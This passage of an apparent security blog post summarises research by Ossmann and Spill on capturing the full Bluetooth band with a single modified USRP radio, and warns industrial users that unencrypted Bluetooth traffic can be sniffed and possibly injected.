However, for the purpose of Bluetooth monitoring, we do not need this filtering. This is because only one of the 79 channels is ever used at once. No one channel will interfere with the communication on another channel. Once the filters were isolated on the 2.4 GHz ISM board in the USRP, Ossmann and Spill could just remove it, choose an appropriate sampling frequency, and rely on the aliased frequencies of the 25 MHz band to pick up the rest of the information. Problem solved, and they can now use one USRP to sample the full band of Bluetooth!

So now that all your Bluetooth traffic are belong to us, the sky is the limit. As pointed out in the presentation, many of these devices do not encrypt traffic before it is transmitted. This opens the door to quite a number of attacks. There is the obvious consumer based traffic that can now be sniffed (cell phone, key board, and so on.) Bluetooth, however, has a strong industrial footing. A lot of these industrial applications are one of a kind systems, tailored for a specific facility. Any industrial facility that uses Bluetooth to monitor and control machinery must now consider this new threat to their assets. If there are any vulnerabilities in their deployed Bluetooth systems, proprietary company information could leak into the wrong hands. The presentation also mentioned that active Bluetooth attacks can now be developed. Once you have the hopping order, you can inject traffic into a piconet. This may lead to DoS attacks, unauthorized access and control, and other devious actions against the industrial equipment. Be forewarned…

-D1AB1069

(cross post on RajWeb)

3 comments

image

This site is protected with Urban Giraffe's plugin 'HTML Purified' and Edward Z. Yang's Powered by HTML Purifier. 24347 items have been purified.